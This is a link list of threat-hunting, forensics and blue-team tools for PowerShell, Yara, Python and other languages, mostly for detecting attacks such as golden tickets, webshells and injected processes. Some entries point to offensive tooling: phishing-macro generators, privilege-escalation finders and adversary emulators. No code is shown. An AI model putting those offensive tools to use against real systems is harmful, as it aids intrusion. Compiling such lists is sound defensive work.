A collection of hunting, blue team scripts and tools ; mostly others.
PowerShell--
fake sandbox https://github.com/Phoenix1747/fake-sandbox
DevSec to detect PS TickUsage & Obfuscation, https://github.com/danielbohannon/DevSec-Defense https://www.x33fcon.com/archive/2018/slides/x33fcon18_DevSecDefense_DanielBohannon.pdf https://www.youtube.com/watch?v=QJe8xikf-iE
Process Spawn Control suspends newly launched processes https://github.com/felixweyne/ProcessSpawnControl
Find injected processes https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
Find Forms https://gist.github.com/staaldraad/0604788fbe974cd53ed59cc1e3185cce
Detect rule attacks in windows events https://gist.github.com/staaldraad/a7de22afa69ec10f1ec7d995d2bd913c
Timeline from memeory https://www.pigstye.net/forensics/volatility.html
Invoke-Adversary to test defenses https://github.com/MotiBa/Invoke-Adversary/tree/master
Baseline gold PEs https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
Remove macros https://chentiangemalc.wordpress.com/2012/01/17/powershell-script-to-remove-office-macro-protection/
PS to pcap https://www.nospaceships.com/2018/09/19/packet-capture-on-windows-without-drivers.html
Find Kerberos Golden Tickets https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285 & https://github.com/spohara79/TGT---Golden-Silver-Ticket
Skeleton Key scanner https://gallery.technet.microsoft.com/Aorato-Skeleton-Key-24e46b73
Detect ruler attacks in Exchange and DC logs https://sensepost.com/blog/2017/notruler-turning-offence-into-defence/
Detect DCShadow attacks https://github.com/AlsidOfficial/UncoverDCShadow
A PowerShell script to interact with the MITRE ATT&CK Framework via its own API https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI
Mitigate internal recon by altering Net Session Enumeration https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
Hunting webshells on Microsoft Exchange Servers https://github.com/FixTheExchange/Invoke-ExchangeWebShellHunter
Power Forensics https://github.com/Invoke-IR/PowerForensics
Mem pull https://github.com/n3l5/irMempull
PS IR https://github.com/mgreen27/Powershell-IR https://www.linkedin.com/pulse/invoke-liveresponse-matthew-green
DeepBlue CLI https://github.com/sans-blue-team/DeepBlueCLI
Jason Fossen's https://github.com/EnclaveConsulting/SANS-SEC505
PS script to detects memory-only CLR (.NET) modules https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58
Flare http://boxstarter.org/package/url?https://raw.githubusercontent.com/fireeye/flare-vm/master/flarevm_malware.ps1 https://github.com/fireeye/flare-vm
RVMI Rekall https://github.com/fireeye/rvmi-rekall
List Kerberos Tickets https://gallery.technet.microsoft.com/scriptcenter/List-All-Cached-Kerberos-5ba41829
List local admins https://gallery.technet.microsoft.com/scriptcenter/ed4a0cb7-603c-488d-afeb-194b7a60f42f
Get AD Trust Topology https://gallery.technet.microsoft.com/scriptcenter/ADFS-Security-Audit-Events-81c207cf & https://github.com/WiredPulse/PowerShell/blob/master/Active_Directory/Get-DomainTrusts.ps1
ADFS Security Audit Events Parser https://gallery.technet.microsoft.com/scriptcenter/ADFS-Security-Audit-Events-81c207cf
Self Signign Certs https://gallery.technet.microsoft.com/scriptcenter/Get-AD-Trust-Topology-f8f2d1d7 & http://cyberfibers.com/2017/11/hunting-self-signed-certificates/
Encrypt/Decrypt files using AES encryption https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
Get the status of A/V local or remote https://gallery.technet.microsoft.com/scriptcenter/Get-the-status-of-4b748f25
List SPNs https://gallery.technet.microsoft.com/List-all-SPNs-Used-in-your-e0c6267a
Invoke web request detection https://gist.github.com/Centurion89/33b9517b75d238b59fd85fd060514279
Another PS list https://www.peerlyst.com/posts/resource-infosec-powershell-tools-resources-and-authors
Managing PowerShell in a modern corporate environment https://www.nccgroup.trust/uk/our-research/managing-powershell-in-a-modern-corporate-environment/
Detect PS obfuscation https://github.com/jaapbrasser/Events/blob/master/2017-09-01_BSidesAms2017/Demo/Demo2.ps1 vid https://www.youtube.com/watch?v=WOC8vC2KoNs&list=PLwZycuzv10iLBFwRIWNAR-s4iuuUMRuEB&index=12
PoSH IR and PS https://github.com/WiredPulse/PoSh-R2
PS hash compare, find bad CCleaner example, net conns http://cyberfibers.com/category/powershell/
EternalBlue vul scan https://gallery.technet.microsoft.com/scriptcenter/EternalBlue-Vulnerability-bf3ad11d
Generate Applocker rule based on hash https://gallery.technet.microsoft.com/scriptcenter/Generate-AppLocker-baaa9278
Check Autoruns at bootup https://gallery.technet.microsoft.com/scriptcenter/Malware-detection-and-995f01eb
CERT diff https://isc.sans.edu/forums/diary/Keep+An+Eye+on+your+Root+Certificates/23030/
fake sandbox https://github.com/Phoenix1747/fake-sandbox
Various PS https://github.com/WiredPulse/PowerShell
Hunt PS scripts https://github.com/DLACERT/ThreatHunting
Detect PTH https://github.com/cyberark/ketshash
Detect shadow admins https://github.com/cyberark/ACLight
Find Exchange Mailboxes with Forwarding Addresses Enabled http://www.syspanda.com/index.php/2018/01/10/exchange-find-mailboxes-forwarding-addresses-enabled/
Get USB history https://gallery.technet.microsoft.com/scriptcenter/Get-USBHistory-707e43a3
ms17-010-Scanner https://github.com/vletoux/ms17-010-Scanner
Find local priv escalation https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
Threat Hunting Reconnaissance Toolkit THRecon https://github.com/TonyPhipps/THRecon
PoweSehll Defense https://github.com/Ben0xA/PowerShellDefense
Extracts Windows Defender Exploit Guard Events from the 'Microsoft-Windows-Windows Defender/Operational event log https://demo.wd.microsoft.com/Content/getEGEvents.zip
Audit script https://github.com/A-mIn3/WINspect
User Simulator https://github.com/ubeeri/Invoke-UserSimulator
Audit AD https://github.com/phillips321/adaudit
Evil Maid detection https://pastebin.com/hAEHibHf
SQli detection https://github.com/NetSPI/PowerUpSQL
Check the carved memory file for presence of Meterpreter C2 https://github.com/countercept/memory-carving-scripts/blob/master/Get-MeterpreterC2.ps1
Dump memory http://www.exploit-monday.com/2012/03/powershell-live-memory-analysis-tools.html#Dump-Memory
Find vul GPOs https://github.com/gpoguy/GetVulnerableGPO
OAuth Hunting (Azure) https://github.com/dmb2168/OAuthHunting
Test phish defenses by w/macros https://github.com/curi0usJack/luckystrike
Discover Unquoted Service Paths that can be abused to escalate privs https://gist.github.com/Evilcry/ba70b8fa746ef7ae352d14bcaaf6bfbb
Yara--
Outlook ruler detetion https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
Signaturing an Authenticode anomaly with Yara https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/signaturing-an-authenticode-anomaly-with-yara/
Loki https://github.com/Neo23x0/Loki
Entropy of PE files https://cyberdefenses.com/yara-entropy-bit-math/
Rule for CCleaner https://blog.nviso.be/2017/09/21/yara-rules-for-ccleaner-5-33/
Detect MimiK golden ticket https://blog.didierstevens.com/2016/08/12/mimikatz-golden-ticket-dcsync/
HEX to assembly https://haiderm.com/convert-hex-assembly-using-simple-python-script/
Bin/API analysis including FN2Yara https://github.com/cmu-sei/pharos
Find fake certs https://blog.nviso.be/2018/07/31/powershell-inside-a-certificate-part-1/
Python--
find malicous .net malware compile https://gist.github.com/countercept/7765ba05ad00255bcf6a4a26d7647f6e
find doublepulsar https://github.com/countercept/doublepulsar-detection-script
Script to check for security bugs in smart contracts https://github.com/ConsenSys/mythril/blob/master/security_checks.md
Ransoeare simulator https://gitlab.com/networkintelligence/inr/ransom_sim/tree/master
Script for malware analysis https://github.com/beenuar/Py-DarkC0de/blob/master/analyse_malware.py
Make your own Volatility plug-in https://github.com/iAbadia/Volatility-Plugin-Tutorial
Kill Chain Fuzzer https://github.com/SafeBreach-Labs/blog-snippets/blob/master/killchainfuzzer.py
FastIR https://github.com/SekoiaLab/Fastir_Collector
Mystique - enterprise malicoius mutex detection https://github.com/MinervaLabsResearch/Mystique
SSDeep Elastic https://github.com/intezer/ssdeep-elastic
Memory Patch detector https://github.com/intezer/MemoryPatchDetector
Script to compare your similar Linux cloud application servers with each other to discover possible indications of compromise. https://github.com/morphuslabs/distinct
Phishing catcher using Certstream (https://certstream.calidog.io/) https://github.com/x0rz/phishing_catcher
Leak File Analyzer https://github.com/Neo23x0/radiocarbon
Find miners https://github.com/wrinkl3/MineSweepR
Inspect PDFs https://github.com/jesparza/peepdf
User simulation https://github.com/cmu-sei/usersim
Find Peddelcheap in pcaps https://github.com/johnbergbom/PeddleCheap/blob/master/dp_decrypt.py (with samples)
Find danderspritz https://github.com/fox-it/danderspritz-evtx
Python exe unpacker https://github.com/countercept/python-exe-unpacker
RDP Bitmap Cache parser https://github.com/ANSSI-FR/bmc-tools
Mac OS IR Tool https://github.com/daguy666/Transit
Tool for automatic list generation of known TOR and VPN exit nodes https://github.com/uforia/exitgather
parsing tool to discover potential SQL injection points https://github.com/RhinoSecurityLabs/SleuthQL
Go
find websells (can use regular expressions) https://github.com/tstillz/webshell-scan
Misc--
Open source tools Netflix Security Team https://medium.com/netflix-techblog/a-brief-history-of-open-source-from-the-netflix-cloud-security-team-412b5d4f1e0c
APT Simulator https://github.com/Neo23x0/APTSimulator
Inection Monkey - APT Simulator https://github.com/guardicore/monkey
CALDERA automated adversary emulation system https://github.com/mitre/caldera
APT3 Emulator https://attack.mitre.org/wiki/Adversary_Emulation_Plans
PS to exe https://github.com/interference-security/PS2EXE
YARA signature to check for DEP and ASLR https://summitroute.com/blog/2017/07/24/yara_sigs_for_security_best_practices/
CyLR CDQR Forensics Virtual Machine (CCF-VM) https://github.com/rough007/CCF-VM (a-z - endpoint IR collection to dbase backend)
Threat Hunting Playbook https://github.com/Kathayra/ThreatHunter-Playbook TH tracking https://github.com/Kathayra/HT-Trackr
Android Vul tester https://github.com/AndroidVTS/android-vts
Sysmon config https://github.com/SwiftOnSecurity/sysmon-config
GRR write up https://chip-dfir.techanarchy.net/?p=395
Detect dll hijacking https://github.com/adamkramer/dll_hijack_detect
Detection mapped to Mitre Matrix https://github.com/redcanaryco/atomic-red-team
.NET runtine inspector https://github.com/enkomio/shed
harden windows https://github.com/securitywithoutborders/hardentools/releases/tag/v1.0
Deception -- It is all about the buzz
Emulate VM enviroments https://github.com/adamkramer/rapid_env
test a sandox - PoC malware with good intentions https://github.com/LordNoteworthy/al-khaser
Pafish - Testing tool to emulate an infection https://github.com/a0rtega/pafish
https://canarytokens.org/generate
todo: FTK scripting https://accessdata.com/product-download/windows-32bit-3.1.1/
Hook Finder https://github.com/hasherezade/hook_finder
Lateral Movement script https://securelist.com/happy-ir-in-the-new-year/83557/
find dll injects http://cyberfibers.com/2017/11/525/
event subscription https://github.com/palantir/windows-event-forwarding
Binary commandline executable to parse ETL files https://github.com/gcpartners/ETLParser
other lists --
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent